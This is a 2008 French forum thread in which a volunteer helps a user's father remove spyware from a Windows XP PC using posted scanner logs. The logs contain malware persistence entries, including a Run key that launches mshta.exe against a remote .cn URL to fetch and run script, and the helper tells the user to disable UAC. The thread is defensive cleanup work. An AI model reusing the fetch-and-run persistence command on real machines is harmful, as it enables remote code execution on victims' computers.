Actualité informatique
Test comparatif matériel informatique
Jeux vidéo
Astuces informatique
Vidéo
Télécharger
Services en ligne
Forum informatique
01Business

|-  SECURITE


|||-  

PC infesté de spywares(résolu)

 

1 utilisateur anonyme
Ajouter une réponse
 

 
Page photos
 
     
Vider la liste des messages à citer
 
 Page :
1
Auteur
 Sujet :

PC infesté de spywares(résolu)

Prévenir les modérateurs en cas d'abus 
Tef35
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 10/11/2008 à 16:38:32  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
Bonjour, Mon pc est lent et j'ai des photos porno qui apparaissent intempestivement.Merci de m'aider


  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 10/11/2008 à 18:20:39  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bonjour,

 Télécharge Navilog1.exe (Il Mafioso) sur ton bureau

 Aide pour Navilog1 : http://www.site-naheulbeuk.com/navilog.php

 Si tu es sous vista : désactive l'UAC !

 Ensuite double clique sur navilog1.exe pour lancer l'installation.
 Une fois l'installation terminée, le fix s'exécutera automatiquement.
 (Si ce n'est pas le cas, double-clique sur le raccourci Navilog1 présent sur le bureau).

 Laisse-toi guider. Au menu principal, choisis 1 et valides.
 /!\ N'utilise pas l'option 2,3 et 4 sans notre accord /!\

 Patiente jusqu'au message :
 "*** Analyse Termine le ..... ***"
 Appuie sur une touche comme demandé, le blocnote va s'ouvrir.
 Copie-colle l'intégralité dans une réponse. Referme le blocnote.
 Le rapport est en outre sauvegardé à la racine du disque (fixnavi.txt)

 Poste-nous son contenu de cette manière :

 -> Edition / Sélectionner tout
 -> Edition / Copier
 -> Clique-Droit / Coller dans ta réponse


 :p


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
(Publicité)
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 11/11/2008 à 09:09:48  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
  Bonjour
 Tef étant absent c'est son papa qui répond.J'ai essayé avec divers outils de réparer mais là ,je cale;enfin voici le rapport

Search Navipromo version 3.6.9 commencé le 11/11/2008 à  8:22:24,37

 !!! Attention,ce rapport peut indiquer des fichiers/programmes légitimes!!!
 !!! Postez ce rapport sur le forum pour le faire analyser !!!
 !!! Ne lancez pas la partie désinfection sans l'avis d'un spécialiste !!!

 Outil exécuté depuis C:\Program Files\navilog1
 Session actuelle : "tef"

 Mise à jour le 05.11.2008 à 21h00 par IL-MAFIOSO


 Microsoft Windows XP [version 5.1.2600]
 Internet Explorer : 6.0.2900.2180
 Système de fichiers : NTFS

 Recherche executé en mode normal

 *** Recherche Programmes installés ***


 *** Recherche dossiers dans "C:\WINDOWS" ***


 *** Recherche dossiers dans "C:\Program Files" ***


 *** Recherche dossiers dans "C:\Documents and Settings\All Users\menudm~1\progra~1" ***


 *** Recherche dossiers dans "C:\Documents and Settings\All Users\menudm~1" ***


 *** Recherche dossiers dans "c:\docume~1\alluse~1\applic~1​" ***


 *** Recherche dossiers dans "C:\Documents and Settings\tef\applic~1" ***


 *** Recherche dossiers dans "C:\Documents and Settings\tef\locals~1\applic~1​" ***


 *** Recherche dossiers dans "C:\Documents and Settings\tef\menudm~1\progra~1​" ***


 *** Recherche avec Catchme-rootkit/stealth malware detector par gmer ***
 pour + d'infos : http://www.gmer.net



 *** Recherche avec GenericNaviSearch ***
 !!! Tous ces résultats peuvent révéler des fichiers légitimes !!!
 !!! A vérifier impérativement avant toute suppression manuelle !!!

 * Recherche dans "C:\WINDOWS\system32" *

 * Recherche dans "C:\Documents and Settings\tef\locals~1\applic~1​" *



 *** Recherche fichiers ***



 *** Recherche clés spécifiques dans le Registre ***


 *** Module de Recherche complémentaire ***
 (Recherche fichiers spécifiques)

 1)Recherche nouveaux fichiers Instant Access :


 2)Recherche Heuristique :

 * Dans "C:\WINDOWS\system32" :


 * Dans "C:\Documents and Settings\tef\locals~1\applic~1​" :


 3)Recherche Certificats :

 Certificat Egroup absent !
 Certificat Electronic-Group absent !
 Certificat Montorgueil absent !
 Certificat OOO-Favorit absent !
 Certificat Sunny-Day-Design-Ltd absent !

 4)Recherche fichiers connus :



 *** Analyse terminée le 11/11/2008 à  8:40:47,90 ***

  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 11/11/2008 à 10:13:14  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bonjour,

 Télécharge ComboFix (créé par sUBs) sur ton Bureau

 Démarre en mode sans échec : http://forum.telecharger.01net [...] ges-1.html


 
  • Double clique combofix.exe.
  • Tape sur la touche 1 pour démarrer le scan puis laisse toi guider.
  • ComboFix redémarrera ton PC
  • Lorsque le scan sera complété, un rapport apparaîtra. Copie/colle ce rapport dans ta prochaine réponse

 NOTE : Le rapport se trouve également ici : C:\Combofix.txt

 ;)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 11/11/2008 à 10:58:24  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
rebonjour

Voila le rapport,j'ai vu qu'il y avait des trucs pas très sympa,ou attrape t il ses saletés :limewire ou MSN?
  ComboFix 08-11-10.01 - tef 2008-11-11 10:30:42.1 - NTFSx86 MINIMAL
 Microsoft Windows XP Professionnel  5.1.2600.2.1252.1.1036.18.401 [GMT 1:00]
 Lancé depuis: c:\documents and settings\tef\Bureau\ComboFix.e​xe

 AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !!
 .

 ((((((((((((((((((((((((((((((​((((((   Autres suppressions   ))))))))))))))))))))))))))))))​))))))))))))))))))
 .

 c:\documents and settings\tef\Application Data\~tmp.html
 c:\documents and settings\tef\Application Data\inst.exe
 c:\documents and settings\tef\Application Data\temp.dll
 c:\windows\runsql.exe
 c:\windows\sv.exe
 c:\windows\svc.exe
 c:\windows\svhoster.exe
 c:\windows\svw.exe
 c:\windows\svx.exe
 c:\windows\svzip.exe
 c:\windows\system32\Cache
 c:\windows\system32\ieupdates.​exe.tmp
 c:\windows\vlc.exe

 .
 ((((((((((((((((((((((((((((((​(((((((((   Pilotes/Services   ))))))))))))))))))))))))))))))​)))))))))))))))))))
 .

 -------\Legacy_IPRIP
 -------\Service_Iprip


 (((((((((((((((((((((((((((((   Fichiers créés du 2008-10-11 au 2008-11-11  ))))))))))))))))))))))))))))))​))))))
 .

 2008-11-11 10:26 . 2008-11-11 10:26 200 --a------ C:\sqmnoopt17.sqm
 2008-11-11 10:26 . 2008-11-11 10:26 200 --a------ C:\sqmdata17.sqm
 2008-11-11 08:20 . 2008-11-11 08:43 <REP> d-------- c:\program files\Navilog1
 2008-11-06 17:36 . 2008-11-06 17:36 236 --a------ C:\sqmdata16.sqm
 2008-11-06 17:36 . 2008-11-06 17:36 200 --a------ C:\sqmnoopt16.sqm
 2008-11-03 11:26 . 2008-11-03 11:26 200 --a------ C:\sqmnoopt15.sqm
 2008-11-03 11:26 . 2008-11-03 11:26 200 --a------ C:\sqmdata15.sqm
 2008-11-02 21:22 . 2008-11-02 21:23 <REP> d-------- c:\program files\Windows Live
 2008-11-02 13:43 . 2008-11-02 13:43 <REP> d-------- c:\program files\Avira
 2008-11-02 13:43 . 2008-11-02 13:43 <REP> d-------- c:\documents and settings\All Users\Application Data\Avira
 2008-11-02 12:22 . 2008-11-02 12:22 <REP> d-------- c:\documents and settings\All Users\Application Data\Grisoft
 2008-11-02 12:18 . 2008-11-02 12:18 <REP> d-------- c:\program files\Trend Micro
 2008-11-02 11:43 . 2008-11-09 19:08 2,634 --a------ c:\windows\system32\tmp.reg
 2008-11-02 11:42 . 2007-09-05 23:22 289,144 --a------ c:\windows\system32\VCCLSID.ex​e
 2008-11-02 11:42 . 2006-04-27 16:49 288,417 --a------ c:\windows\system32\SrchSTS.ex​e
 2008-11-02 11:42 . 2008-09-08 22:38 88,576 --a------ c:\windows\system32\AntiXPVSTF​ix.exe
 2008-11-02 11:42 . 2008-10-01 14:51 87,552 --a------ c:\windows\system32\VACFix.exe
 2008-11-02 11:42 . 2008-10-10 07:58 82,944 --a------ c:\windows\system32\o4Patch.ex​e
 2008-11-02 11:42 . 2008-05-18 20:40 82,944 --a------ c:\windows\system32\IEDFix.exe
 2008-11-02 11:42 . 2008-10-10 07:58 82,944 --a------ c:\windows\system32\IEDFix.C.e​xe
 2008-11-02 11:42 . 2008-08-18 11:19 82,432 --a------ c:\windows\system32\404Fix.exe
 2008-11-02 11:42 . 2004-07-31 17:50 51,200 --a------ c:\windows\system32\dumphive.e​xe
 2008-11-02 11:42 . 2007-10-03 23:36 25,600 --a------ c:\windows\system32\WS2Fix.exe
 2008-11-01 13:18 . 2008-11-01 13:18 <REP> d-------- c:\program files\Lavasoft
 2008-11-01 13:18 . 2008-11-01 18:15 <REP> d-------- c:\documents and settings\All Users\Application Data\Lavasoft
 2008-10-31 20:11 . 2008-10-31 20:11 <REP> d-------- c:\windows\system32\xlib254.dl​l
 2008-10-31 20:11 . 2008-10-31 20:11 <REP> d-------- c:\windows\system32\append.dll
 2008-10-31 20:09 . 2008-10-31 20:09 111 --a------ C:\testflo.bat
 2008-10-31 20:09 . 2008-10-31 20:09 111 --a------ C:\testfile.bat
 2008-10-31 20:08 . 2008-10-31 20:08 1,536 --a------ C:\run.exe
 2008-10-31 19:39 . 2008-10-31 19:07 233,472 --a------ c:\windows\wdmon.VIR
 2008-10-31 19:38 . 2008-10-31 19:39 109 --ahs---- c:\windows\system32\1759799927​.dat

 .
 ((((((((((((((((((((((((((((((​((((   Compte-rendu de Find3M   ))))))))))))))))))))))))))))))​))))))))))))))))))
 .
 2008-11-10 12:41 --------- d-----w c:\documents and settings\tef\Application Data\LimeWire
 2008-09-20 08:52 --------- d-----w c:\program files\Microsoft
 2008-09-20 08:46 --------- d-----w c:\program files\Fichiers communs\Windows Live
 2008-09-11 13:11 --------- d-----w c:\documents and settings\tef\Application Data\Roxio
 2008-09-11 11:38 47,360 ----a-w c:\documents and settings\tef\Application Data\pcouffin.sys
 2008-09-11 11:38 --------- d-----w c:\documents and settings\tef\Application Data\Vso
 2008-03-06 10:42 278,528 -c--a-w c:\program files\Fichiers communs\FDEUnInstaller.exe
 .

 ((((((((((((((((((((((((((((((​(((   Points de chargement Reg   ))))))))))))))))))))))))))))))​))))))))))))))))))
 .
 .
 *Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
 REGEDIT4

 [HKEY_CURRENT_USER\SOFTWARE\Mic​rosoft\Windows\CurrentVersion\​Run]
 "CTFMON.EXE"="c:\windows\syste​m32\ctfmon.exe" [2004-08-19 15360]
 "NvMediaCenter"="c:\windows\Sy​stem32\NVMCTRAY.DLL" [2003-10-06 49152]
 "MsnMsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2008-09-09 3513344]

 [HKEY_LOCAL_MACHINE\SOFTWARE\Mi​crosoft\Windows\CurrentVersion​\Run]
 "NvCplDaemon"="c:\windows\Syst​em32\NvCpl.dll" [2003-10-06 5058560]
 "SunJavaUpdateSched"="c:\progr​am files\Java\jre1.6.0_07\bin\jus​ched.exe" [2008-06-10 144784]
 "Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-01-11 39792]
 "avgnt"="c:\program files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [2008-06-12 266497]
 "MSConfig"="c:\windows\PCHealt​h\HelpCtr\Binaries\MSConfig.ex​e" [2004-08-19 160768]
 "nwiz"="nwiz.exe" [2003-10-06 c:\windows\system32\nwiz.exe]

 [HKEY_USERS\.DEFAULT\Software\M​icrosoft\Windows\CurrentVersio​n\Run]
 "CTFMON.EXE"="c:\windows\Syste​m32\CTFMON.EXE" [2004-08-19 15360]

 [HKEY_CURRENT_USER\software\mic​rosoft\windows\Currentversion\​policies\explorer\Run]
 "test"="mshta.exe" [2004-08-19 c:\windows\system32\mshta.exe]

 [HKEY_LOCAL_MACHINE\system\curr​entcontrolset\control\lsa]
 UpdateWin REG_SZ          c:\windows\system32\admparsen.​exe

 [HKLM\~\startupfolder\C:^Docume​nts and Settings^All Users^Menu Démarrer^Programmes^Démarrage^​InterVideo WinCinema Manager.lnk]
 path=c:\documents and settings\All Users\Menu Démarrer\Programmes\Démarrage\​InterVideo WinCinema Manager.lnk
 backup=c:\windows\pss\InterVid​eo WinCinema Manager.lnkCommon Startup

 [HKLM\~\startupfolder\C:^Docume​nts and Settings^All Users^Menu Démarrer^Programmes^Démarrage^​Microsoft Office.lnk]
 path=c:\documents and settings\All Users\Menu Démarrer\Programmes\Démarrage\​Microsoft Office.lnk
 backup=c:\windows\pss\Microsof​t Office.lnkCommon Startup

 [HKEY_LOCAL_MACHINE\software\mi​crosoft\security center]
 "FirewallOverride"=dword:00000​001

 [HKLM\~\services\sharedaccess\p​arameters\firewallpolicy\stand​ardprofile\AuthorizedApplicati​ons\List]
 "%windir%\\system32\\sessmgr.e​xe"=
 "c:\\Program Files\\LimeWire\\LimeWire.exe"​=
 "c:\\Program Files\\Windows Live\\Messenger\\wlcsdk.exe"=
 "c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=

 S3 3xHybrid;Pinnacle PCTV 100i-110i-300i-310i-MCE;c:\win​dows\system32\DRIVERS\3xHybrid​.sys [2006-11-22 1121536]
 S3 Ltn_stk7070P;PCTV based TV tuner device;c:\windows\system32\DRI​VERS\Ltn_stk7070P.sys [2007-06-14 466048]
 S3 Ltn_stkrc;PCTV Infrared Receiver;c:\windows\system32\D​RIVERS\Ltn_stkrc.sys [2007-06-13 13440]
 S3 MPCSYS;MPCSYS;c:\windows\Syste​m32\DRIVERS\mpcsys.sys [2008-03-23 15360]
 S3 PctvVirtualNdis;Pinnacle Virtual Miniport;c:\windows\system32\D​RIVERS\PctvVirtualNdis.sys [2007-02-02 13696]

 [HKEY_CURRENT_USER\software\mic​rosoft\windows\currentversion\​explorer\mountpoints2\{022b3e4​b-63a5-11dd-a8b3-000b6b9a60d1}​]
 \Shell\Auto\command - hjohymjdm.exe
 \Shell\AutoRun\command - c:\windows\system32\RunDLL32.E​XE Shell32.DLL,ShellExec_RunDLL hjohymjdm.exe
 .
 - - - - ORPHELINS SUPPRIMES - - - -

 HKCU-Run-Uniblue RegistryBooster 2 - c:\program files\Uniblue\RegistryBooster 2\RegistryBooster.exe
 HKCU-Run-PMCLoader - c:\program files\Pinnacle\TVCenter Pro\PMCLoader.exe
 HKLM-Run-Cmaudio - cmicnfg.cpl
 HKCU-Explorer_Run-Msn - c:\test.exe
 HKCU-Explorer_Run-MsnHost - c:\test.exe
 HKCU-Explorer_Run-MsnLoad - c:\test.exe
 HKCU-Explorer_Run-MsnConvert - c:\test.exe
 HKCU-Explorer_Run-MsnMessendge​r - c:\test.exe
 SharedTaskScheduler-IPC Configuration Utility - (no file)
 SharedTaskScheduler-{020487CC-​FC04-4B1E-863F-D9801796230B} - c:\docume~1\tef\LOCALS~1\Temp\​wndutl32.dll
 MSConfigStartUp-netc - c:\windows\svc.exe
 MSConfigStartUp-netw - c:\windows\svw.exe
 MSConfigStartUp-netx - c:\windows\svx.exe



 ******************************​******************************​**************

 catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
 Rootkit scan 2008-11-11 10:43:27
 Windows 5.1.2600 Service Pack 2 NTFS

 Recherche de processus cachés ...

 Recherche d'éléments en démarrage automatique cachés ...

 Recherche de fichiers cachés ...

 Scan terminé avec succès
 Fichiers cachés: 0

 ******************************​******************************​**************
 .
 Heure de fin: 2008-11-11 10:45:30 - La machine a redémarré
 ComboFix-quarantined-files.txt  2008-11-11 09:45:26

 Avant-CF: 32 385 114 112 octets libres
 Après-CF: 35,162,222,592 octets libres

 143

(Publicité)
  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 11/11/2008 à 12:09:38  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
tout ce qui est P2P c'est bourré d'infections (limewire, emule, etc...) ;)

 Passe un coup de MalwareBytes (scan complet) et nettoie tout ce qu'il trouve
 Aide : http://www.site-naheulbeuk.com/malwarebytes.php
 Post moi le rapport généré à la fin dans ta prochaine réponse :)

 ;)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 11/11/2008 à 13:43:27  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
Voili voila un peu long mais pas mal infecté;
  Malwarebytes' Anti-Malware 1.27
 Version de la base de données: 1127
 Windows 5.1.2600 Service Pack 2

 11/11/2008 13:38:11
 mbam-log-2008-11-11 (13-38-11).txt

 Type de recherche: Examen complet (C:\|J:\|)
 Eléments examinés: 60461
 Temps écoulé: 37 minute(s), 0 second(s)

 Processus mémoire infecté(s): 0
 Module(s) mémoire infecté(s): 0
 Clé(s) du Registre infectée(s): 3
 Valeur(s) du Registre infectée(s): 5
 Elément(s) de données du Registre infecté(s): 0
 Dossier(s) infecté(s): 2
 Fichier(s) infecté(s): 19

 Processus mémoire infecté(s):
 (Aucun élément nuisible détecté)

 Module(s) mémoire infecté(s):
 (Aucun élément nuisible détecté)

 Clé(s) du Registre infectée(s):
 HKEY_LOCAL_MACHINE\SYSTEM\Cont​rolSet001\Services\secdrv (Rootkit.Agent) -> Quarantined and deleted successfully.
 HKEY_LOCAL_MACHINE\SYSTEM\Cont​rolSet003\Services\secdrv (Rootkit.Agent) -> Quarantined and deleted successfully.
 HKEY_LOCAL_MACHINE\SYSTEM\Curr​entControlSet\Services\secdrv (Rootkit.Agent) -> Quarantined and deleted successfully.

 Valeur(s) du Registre infectée(s):
 HKEY_LOCAL_MACHINE\SOFTWARE\Mi​crosoft\Ole\UpdateWin (Worm.Sdbot) -> Quarantined and deleted successfully.
 HKEY_LOCAL_MACHINE\SYSTEM\Cont​rolSet001\Control\Lsa\UpdateWi​n (Worm.Sdbot) -> Quarantined and deleted successfully.
 HKEY_LOCAL_MACHINE\SYSTEM\Curr​entControlSet\Control\Lsa\Upda​teWin (Worm.Sdbot) -> Quarantined and deleted successfully.
 HKEY_CURRENT_USER\SOFTWARE\Mic​rosoft\OLE\UpdateWin (Worm.Sdbot) -> Quarantined and deleted successfully.
 HKEY_CURRENT_USER\SYSTEM\Curre​ntControlSet\Control\Lsa\Updat​eWin (Worm.Sdbot) -> Quarantined and deleted successfully.

 Elément(s) de données du Registre infecté(s):
 (Aucun élément nuisible détecté)

 Dossier(s) infecté(s):
 C:\WINDOWS\system32\append.dll (Trojan.Agent) -> Quarantined and deleted successfully.
 C:\WINDOWS\system32\xlib254.dl​l (Trojan.Agent) -> Quarantined and deleted successfully.

 Fichier(s) infecté(s):
 C:\Qoobox\Quarantine\C\WINDOWS​\runsql.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\sv.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\svc.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\svw.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\svx.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\svzip.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\Qoobox\Quarantine\C\WINDOWS​\vlc.exe.vir (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0038113.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039235.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039236.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039237.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039239.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039240.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039241.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\System Volume Information\_restore{EE246F97-​8A9F-4B77-B5E6-E41F5EEBE943}\R​P145\A0039242.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\WINDOWS\wdmon.VIR (Trojan.Downloader) -> Quarantined and deleted successfully.
 C:\testflo.bat (Trojan.Agent) -> Quarantined and deleted successfully.
 C:\WINDOWS\system32\drivers\se​cdrv.sys (Rootkit.Agent) -> Quarantined and deleted successfully.
 C:\Documents and Settings\tef\Application Data\config.cfg (Malware.Trace) -> Quarantined and deleted successfully.

  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 11/11/2008 à 23:37:51  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bonsoir,

 Télécharge HijackThis

 Guide d'utilisation : http://www.site-naheulbeuk.com/hijackthis.php

 Clique alors sur "Do a system scan and save a logfile"
 Le scan se fait très rapidement, puis un bloc-note apparaît
 (le "logfile" )
 Dans ce bloc-note, va dans "Edition", puis "Selectionner Tout",
 le texte est alors séléctionné, retourne dans "Edition" toujours
 en laissant le texte séléctionné, et clique sur copier.
 Colle le contenu ici dans ta prochaine réponse !

 ;)


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
(Publicité)
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 12/11/2008 à 10:21:57  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
bonjour
 pas trés matinal ce matin :sleep:  et le fiston n'est toujours pas là.

  Enfin voila le rapport
 Logfile of Trend Micro HijackThis v2.0.2
 Scan saved at 10:14:47, on 12/11/2008
 Platform: Windows XP SP2 (WinNT 5.01.2600)
 MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
 Boot mode: Safe mode

 Running processes:
 C:\WINDOWS\System32\smss.exe
 C:\WINDOWS\system32\winlogon.e​xe
 C:\WINDOWS\system32\services.e​xe
 C:\WINDOWS\system32\lsass.exe
 C:\WINDOWS\system32\svchost.ex​e
 C:\WINDOWS\system32\svchost.ex​e
 C:\WINDOWS\Explorer.EXE
 C:\Program Files\Trend Micro\HijackThis\HijackThis.ex​e

 R1 - HKLM\Software\Microsoft\Intern​et Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
 R1 - HKLM\Software\Microsoft\Intern​et Explorer\Main,Default_Search_U​RL = http://go.microsoft.com/fwlink/?LinkId=54896
 R1 - HKLM\Software\Microsoft\Intern​et Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
 R0 - HKCU\Software\Microsoft\Intern​et Explorer\Toolbar,LinksFolderNa​me = Liens
 O2 - BHO: Aide pour le lien d'Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7​D6BE0B3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\​AcroIEHelper.dll
 O2 - BHO: Click-to-Call BHO - {5C255C8A-E604-49b4-9D64-90988​571CECB} - C:\Program Files\Windows Live\Messenger\wlchtc.dll
 O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF​1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv​.dll
 O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-51647​60863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
 O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF105​77473F7} - c:\program files\google\googletoolbar1.dl​l
 O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-00902​7A5CD4F} - c:\program files\google\googletoolbar1.dl​l
 O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,​NvStartup
 O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
 O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jus​ched.exe"
 O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
 O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
 O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Bi​naries\MSConfig.exe /auto
 O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
 O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.D​LL,NvTaskbarInit
 O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
 O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://ob9swb66k3onqsv8zrwg.cn/s_t.php
 O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE RÉSEAU')
 O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
 O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401​C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv​.dll
 O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401​C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv​.dll
 O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04​F795683} - C:\Program Files\Messenger\msmsgs.exe
 O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04​F795683} - C:\Program Files\Messenger\msmsgs.exe
 O16 - DPF: {17492023-C23A-453E-A040-C7C58​0BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
 O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
 O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
 O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.e​xe
 O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1​1\Intel 32\IDriverT.exe
 O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.ex​e
 O23 - Service: Service de lancement de WlanCfg (Wlancfg) - Inventel - C:\Program Files\Inventel\Gateway\wlancfg​.exe

 --
 End of file - 4406 bytes

  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 12/11/2008 à 10:25:17  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
re, :)

 Relance HijackThis, coche cette ligne :

 O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://ob9swb66k3onqsv8zrwg.cn/s_t.php

 --> clic sur fix checked

 Redémarre l'ordinateur

 ensuite :

 Fais un scan BitDefender en ligne (avec Internet Explorer pas avec Firefox !)
 (clique à gauche sur scan online).
 et post moi le rapport de ce scan ici une fois terminé !

 Guide d'utilisation de Bitdefender en ligne (merci Bruce Lee) : http://cybersecurite.xooit.com [...] fender.htm

 bonne journée :hello:


---------------
Visitez mon site sur la sécurité informatique : http://www.site-naheulbeuk.com
tef35
Bébé forumeur (De 10 à 49 messages postés)
  1. Posté le 12/11/2008 à 11:32:39  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
re

 Impossible de faire un scan BitDefender.J'ai le messaage suivant ;Could not load the online scanner: j'ai cliqué sur le lien mais là ça se corse c'est en anglais?? :??:

(Publicité)
  1. homepage
naheulbeuk7
Membre impliqué (de 20 000 à 29 999 messages postés)
  1. Posté le 12/11/2008 à 11:53:38  
  1. answer
  1. Prévenir les modérateurs en cas d'abus
 
lol essaie ca alors :D

 
  • Fais un scan en ligne Kaspersky avec Internet Explorer (lance Internet Explorer en tant que -> "administrateur" )
  • Dans la nouvelle fenêtre, clique sur J'accepte.
  • Valide l'installation d'un ou de plusieurs ActiveX si c'est nécessaire.
  • Patiente pendant l'installation des Mises à jour.
  • Choisis par la suite l'analyse du Poste de travail
  • Sauvegarde puis colle le rapport généré en fin d'analyse.

 AIDE :
 Tutoriel
 Configurer le contrôle des ActiveX

